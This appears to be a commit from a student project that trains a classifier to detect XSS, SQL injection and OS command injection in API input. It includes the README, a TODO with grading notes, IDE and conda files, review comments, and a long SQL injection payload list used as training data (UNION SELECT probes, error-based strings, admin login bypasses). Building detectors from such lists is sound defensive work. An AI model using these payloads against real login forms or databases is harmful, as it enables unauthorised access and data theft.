Current state of the project

Krystian Piwowarczyk 2024-01-21 17:51:17 +01:00
commit 5a61942849
28 changed files with 48285 additions and 0 deletions

3
.idea/.gitignore vendored Normal file

@ -0,0 +1,3 @@
# Default ignored files
/shelf/
/workspace.xml
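Review bot: this .gitignore only excludes /shelf/ and /workspace.xml, so the rest of .idea/ (misc.xml, modules.xml, the .iml module file and the inspection profile settings) is committed with the project. Those files record one developer's local IDE state, such as the interpreter name "Python 3.10", and will churn on every machine that opens the project. Consider ignoring .idea/ in the repository's top-level .gitignore and dropping these files from the commit; the conda environment.yaml planned in TODO.txt is the better place to pin the interpreter.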


@ -0,0 +1,6 @@
<component name="InspectionProjectProfileManager">
<settings>
<option name="USE_PROJECT_PROFILE" value="false" />
<version value="1.0" />
</settings>
</component>

7
.idea/misc.xml Normal file

@ -0,0 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Black">
<option name="sdkName" value="Python 3.10" />
</component>
<component name="ProjectRootManager" version="2" project-jdk-name="Python 3.10" project-jdk-type="Python SDK" />
</project>

8
.idea/modules.xml Normal file

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/python3-project-bigdata.iml" filepath="$PROJECT_DIR$/.idea/python3-project-bigdata.iml" />
</modules>
</component>
</project>


@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$" />
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
</module>

35
README.md Normal file

@ -0,0 +1,35 @@
# Temat projektu
Projekt zwraca użytkownikowi informacje na temat tego czy przekazany poprzez API ciąg znaków zawiera w sobie próbę ataku z jednej z poniższych klas:
Cross Site-Scripting
SQL Injection
OS Command Injection
# Dane trenujące
Do wytrenowania sieci wykorzystano publicznie dostępne zbiory przykładowych payloadów:
https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt
https://github.com/CyberM0nster/SQL-Injection-Payload-List-
https://github.com/omurugur/OS_Command_Payload_List/blob/master/OS-Command-Fuzzing.txt
Dane "zwykłe" (w rozumieniu - wolne od próby ataku na aplikacje) uzyskano poprzez framework Faker (10200 wartości).
Dane te wygenerowano z użyciem następujących funkcji:
faker.ascii_company_email()
faker.city()
faker.country()
faker.postcode()
faker.street_address()
faker.iban()
faker.company()
faker.credit_card_number()
faker.date_of_birth()
faker.domain_name()
faker.job()
faker.sentence(nb_words=10)
faker.passport_number()
faker.name()
faker.phone_number()
faker.ssn()
faker.user_agent()
Zbiór ten reprezentuje typowe dane wprowadzane przez użytkowników do formularzy w aplikacjach webowych.
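Review bot: the benign class described in the "Dane trenujące" section comes only from Faker fields (e-mail, city, IBAN, name, phone number and so on), so few of the "normal" samples are likely to contain quotes, angle brackets or SQL keywords, while most attack samples do. A model trained on that contrast can score well by learning "special characters mean attack" and will then flag legitimate input such as a surname with an apostrophe or a support message that mentions SELECT. Consider adding benign samples with that kind of punctuation, and state how many samples each of the three attack lists contributes next to the 10200 benign values so the class balance is visible. Formatting: the attack classes, the source URLs and the Faker calls are bare lines under the headings and will render as one run-on paragraph in Markdown; make them list items.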

30
TODO.txt Normal file

@ -0,0 +1,30 @@
1. Wygenerowanie legitnych danych
2. Wytrenowanie lokalnego modelu - podzielenie danych na treningowe oraz testowe
3. Wystawienie modelu poprzez REST API
4. Stworzenie 2-3 przypadków testowych
5. Przygotowanie environment.yaml condy
6. Udostępnienie aplikacji w sieci wydziałowej (przez ten https://cloud.wmi.amu.edu.pl/#v1:0:18:4::::::: )
7. Przygotowanie prezentacji na zaliczenie (w tym dane histograficzne - rozkład znaków, długość ciągu znaków w przypadku zwykłych danych oraz ataków (pewnie przy róznych atakach pojawią się określone znaki specjalne) czyli zaprezentować analizę tego zbioru danych (tabelki, wykresy, wnioski))
Projekt ma posiadać environment.yaml condy - konfiguracja środowsika
do tego statystyki danych - jaki procent poszczególnych typów danych znajdował się w zbiorach treningowych, testowych itd.
dane histograficzne - rozkład znaków, długość ciągu znaków w przypadku zwykłych danych oraz ataków (pewnie przy róznych atakach pojawią się określone znaki specjalne)
Skala ocen:
- Należy wybrać zbiór danych (akceptacja grup oraz zbioru danych przez prowadzącego na pierwszych 17.11.21 lub drugich zajęciach 18.11.23), zaprezentować analizę tego zbioru danych (tabelki, wykresy, wnioski) w max 10 minut- zaliczenie na ocenę 3)
- Należy wytrenować prosty model uczenia maszynowego (lub użyć gotowego modelu) i zaprezentować jego wyniki na zbiorze testowym. Jakość modelu nie będzie oceniana, ale powinien radzić sobie lepiej niż bardzo prosty model (klasa większościowa dla klasyfikacji lub średnia dla regresji)- zaliczenie na ocenę 4
- Należy wystawić model z poprzedniego punktu w prostej aplikacji REST i zaprezentować jego działanie. Do aplikacji powininy być napisane conajmniej 2-3 proste przypadki testowe- zaliczenie na llocenę 4.5
- Należy udostępnić aplikację w sieci wydziałkowej 5
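Review bot: items 3 and 6 put the model behind a REST API and then expose it on the faculty network, but no item covers limits on that endpoint: a maximum input length, request rate limiting, and what the API returns for empty or non-text input. Add those as a step before item 6 and cover them in the test cases from item 4. Also, the environment.yaml requirement and the histogram requirement each appear twice (items 5 and 7, then again in the free text below the list), and the grading notes give the class dates as 17.11.21 and 18.11.23, one of which looks like a typo.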

0
__init__.py Normal file

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

File diff suppressed because it is too large

23676
datasets/out.csv Normal file

File diff suppressed because it is too large

File diff suppressed because it is too large

808
datasets/sql-injection.txt Normal file

@ -0,0 +1,808 @@
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
UNION ALL SELECT NULL#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
UNION ALL SELECT NULL
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
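Review bot: Most of these rows are one template repeated with only the column count or the trailing comment changed (for example the `UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,...` ladder and the three `AND 5650=CONVERT(INT,(...` blocks ending in `--`, `#` and nothing), so a random train/test split will place near-identical strings on both sides and overstate the classifier's accuracy. Collapse each ladder to a few representatives, or split by template group so that variants of one template never straddle the split. The `SELECTCHAR(88)` rows have lost the space between `SELECT` and `CHAR`, so the model learns a token that no SQL parser would accept; either restore the space or note that the malformed form is intentional. The bare fragments such as `' '`, `"-"` and `or 1=1` are short enough to occur in ordinary input, so they should be checked against benign samples for false positives before they are kept as positives.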

6613
datasets/xss.txt Normal file

File diff suppressed because it is too large

532
environment.yml Normal file

@ -0,0 +1,532 @@
name: base
channels:
- defaults
dependencies:
- _anaconda_depends=2023.09=py311_mkl_1
- _libgcc_mutex=0.1=main
- _openmp_mutex=5.1=1_gnu
- abseil-cpp=20211102.0=hd4dd3e8_0
- aiobotocore=2.7.0=py311h06a4308_0
- aiohttp=3.9.0=py311h5eee18b_0
- aioitertools=0.7.1=pyhd3eb1b0_0
- aiosignal=1.2.0=pyhd3eb1b0_0
- alabaster=0.7.12=pyhd3eb1b0_0
- anaconda-anon-usage=0.4.2=py311hfc0e8ea_0
- anaconda-catalogs=0.2.0=py311h06a4308_0
- anaconda-client=1.12.1=py311h06a4308_0
- anaconda-cloud-auth=0.1.4=py311h06a4308_0
- anaconda-navigator=2.5.0=py311h06a4308_0
- anaconda-project=0.11.1=py311h06a4308_0
- anyio=3.5.0=py311h06a4308_0
- aom=3.6.0=h6a678d5_0
- appdirs=1.4.4=pyhd3eb1b0_0
- archspec=0.2.1=pyhd3eb1b0_0
- argon2-cffi=21.3.0=pyhd3eb1b0_0
- argon2-cffi-bindings=21.2.0=py311h5eee18b_0
- arrow=1.2.3=py311h06a4308_1
- arrow-cpp=11.0.0=h374c478_2
- astroid=2.14.2=py311h06a4308_0
- astropy=5.3.4=py311hf4808d0_0
- asttokens=2.0.5=pyhd3eb1b0_0
- async-lru=2.0.4=py311h06a4308_0
- atomicwrites=1.4.0=py_0
